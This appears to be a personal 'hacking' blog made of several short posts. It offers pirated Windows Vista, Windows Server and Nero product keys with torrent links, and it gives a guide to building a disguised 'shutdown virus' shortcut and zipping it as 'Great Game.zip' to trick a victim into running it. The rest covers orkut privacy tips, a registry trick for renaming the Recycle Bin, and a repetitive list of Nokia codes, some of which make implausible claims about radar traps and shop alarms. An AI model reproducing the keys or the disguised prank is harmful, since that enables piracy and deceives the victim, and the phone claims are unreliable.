Vista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCH

Vista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTR

Vista|HomeBasicN|Acer|22TC9-RDMDD-VXMXD-2XM2Y-DT6FX

Vista|HomePremium|Acer|2TYBW-XKCQM-XY9X3-JDXYP-6CJ97

Vista|Starter|Acer|26VQB-RP3T9-63FVV-VD7RF-H7M2Q

Server|SBS|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Business|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Enterprise|Dell|26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ

Server|Standard|Dell|223PV-8KCX6-F9KJX-3W2R7-BB2FH


Labels: 4 comments | | edit post
ANKUSH
NERO 9.0.9.4c BY ANKUSH(NEW)

download nero 9 (torrent)

9M03-019A-X6AM-Z365-28EH-AX3K-LL1X-19HP


nero 10 activation

download nero 10(torrent)

1E30-AXC1-19M2-94KK-520A-CK81-83E4

ENJOY HACKING[ANKUSH]

IF U WANT THE SERIAL OF ANY SOFTWARE THEN MAIL ME AT ankuraja@gmail.com


Labels: 1 comments | | edit post
ANKUSH
I was asked by many people to tell me the way to protect your orkut account.PLese reply and show your feed backThis Simple Tutorial will Save you from Spam mails and Hacking Tricks used by Many hackers.
As you know you can hide your primary email address from non-friends but if by mistake you add a unknown person to your friend list, then he/she will be able to see your primary email address which you use to login. He can send dangerous emails (keyloggers etc.) and steal your Orkut account. There are two Methods to be safe:


1. Changing Primary Email:
Go To Edit Profle Page of your profile, then click on COntact tab and change your Primary Email address to some other id, which you don't use much. Your login id will remain same but your friends will see your other email id.

2. Using Fake EMail id:
It is the most effective way of hiding email id, but it requires a new account, If you have some larger communities and want safety, then follow this method:

Create a new Orkut account, On the Sign Up page enter any id which does not exist like yourname@yourname.com, me@orkutaccount.com etc.
Then after entering other details, you will be redirected to your home page and with a message "Verify Your Email", Just igonore it and do as stated below
Now Go to google.com, you will see your fake id on the top-right corner yourname@yourname.com, You can see "My Account" Option there.
Go To "My Account Page" and create a gmail id from there. (You can see it under Try Some More)
Done! You have your new login id but your friends will still see your fake id :| Enjoy

enjoy hacking[ankush]
Labels: 1 comments | | edit post
ANKUSH
Many people asked me to write a post about on Registry hacks,so here is the post on "How to rename recyclebin"

You can rename recycle bin by following method:


1-Click Start menu > Run > and type “regedit” (without quotes), to run Windows Registry Editor

2- Find and go to following “HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”

3- Change the name "Recycle Bin" to whatever you want

enjoy hacking [ankush]
Labels: 0 comments | | edit post
ANKUSH
1) Right click on desktop, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" or anything of your choice

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

After you have given it a name click on finish.
You should now have an icon on your desktop that is called "Hack msn" or whatever name you gave it.
It is also advised you change the icon to something different,So the victim fall for it.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone to shutdown their pc while chatting

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it yourself.

Ok go to start, run type cmd, then in cmd type: shutdown -a.

enjoy hacking[ankush]
Labels: 0 comments | | edit post
ANKUSH
==================================
Nokia Secret Codes by Ankush Kumar
==================================


On the main screen type in:

*#06# for checking the IMEI (International Mobile Equipment Identity).

*#7780# reset to factory settings.

*#67705646# This will clear the LCD display(operator logo).

*#0000# To view software version.

*#2820# Bluetooth device address.

*#746025625# Sim clock allowed status.

#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.

*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.

*#4720# - Half Rate Codec activation.

*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#

Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
*#7328748263373738# resets security code.

Default security code is 12345

Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.


Code Function
*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
#3370# Deactivate Enhanced Full Rate Codec (EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec

#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
12345 This is the default security code

*#21# Allows you to check the number that “All Calls” are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the “Call Waiting” status of your phone.
*#61# Allows you to check the number that “On No Reply” calls are diverted to
*#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to
*#67# Allows you to check the number that “On Busy Calls” are diverted to

*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)

*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed", it means you will get the best standby time possible
*#94870345123456789# Deactivate the PWM-Mem
press and hold # Lets you switch between lines

*#7760# Manufacturers code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again

**21*number# Turn on “All Calls” diverting to the phone number entered
**61*number# Turn on “No Reply” diverting to the phone number entered
**67*number# Turn on “On Busy” diverting to the phone number entered


Nokia Secret Codes
The complete guide

Here's a list of known codes on Nokia mobile phones. This list does not include codes that make request to the network. To use these codes, just dial them like normal numbers.

Code Description
*#06# Display the IMEI (GSM standard)

*#0000# Display the firmware version and date (with variant info on S40 second edition or newer)

*#9990# Says "Bluetooth Test Mode" on Symbian models; accepts without any messages and Bluetooth behaves abnormally on non-Symbian ones (models with build-in Bluetooth radio, activate first to use)

*#bta0# Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)

*#mac0wlan# Display the WLAN MAC address (models with build-in Wi-fi radio)

*#opr0logo# Clear the operator logo (3310 and 3330 only)

*#pca0# Activate the GPRS PCCCH support (early GPRS models)

*#pcd0# Deactivate the GPRS PCCCH support (early GPRS models)

*#res0wallet# Reset the mobile wallet (models with mobile wallet)

*#res0# Soft-format the memory (Symbian models only)

*#rst0# Reset to factory defaults, confirmation required (DCT4 or newer)

*#sim0clock# Display the SIM clock status (DCT3 only)

*#ssn0# Display the manufacturing serial number (mid-range and premium DCT3, basically all DCT4 and BB5 non-Symbian models)

*#war0anty# Display the manufacturing and repair info (no exit on DCT3) or total talk time on

Symbian models

*efr0# Enable EFR encoding (pre-2003 models)

#efr0# Disable EFR encoding (pre-2003 models)

*hra0# Enable HR encoding (pre-2003 models)

#hra0# Disable HR encoding (pre-2003 models)

#pw+1234567890+n# Display the SIM lock status: (pre-2003 models)

n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock
n# n = 1..999: recall the number stored in the SIM location n (DCT3, DCT4, BB5 models)


These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu

One useful function that all Nokia’s I’ve owned have is “Cell Info Display” which can usually be found in the phones “Display settings” (eg: in a Nokia 1600) or “Phone Settings” (eg: in a Nokia 3315)

If your network supports it, when “Cell Info Display” is enabled, it will display the name of the base station your mobile is currently connected to on the screen. eg: when i’m walking around the city it says “Sydney CBD” and when i’m at home it displays the name of my suburb.

Note:

To display “p” press “*” three times within one second, To display “w” press “*” four times within one second, To display “+” press twice “*” within less than a second

Code Function

*3370# / #3370# Activate / Deactivate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

*#4720# / *#4720# Activate / Deactivate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#7220# / *#7230# Enable / Disable PCCCPH support (faster GPRS)


#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

12345 This is the default security code

*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type

*#9999# Phones software version if *#0000# does not work

*#06# For checking the International Mobile Equipment Identity (IMEI Number)

*#67705646# Removes operator logo on 3310 & 3330

*#73# Reset phone timers and game scores

*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
press and hold # Lets you switch between lines

*#7760# Manufacturers code

*#7780# Restore factory settings

*#8110# Software version for the nokia 8110

*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again

enjoy hacking [ankush]
Labels: 2 comments | | edit post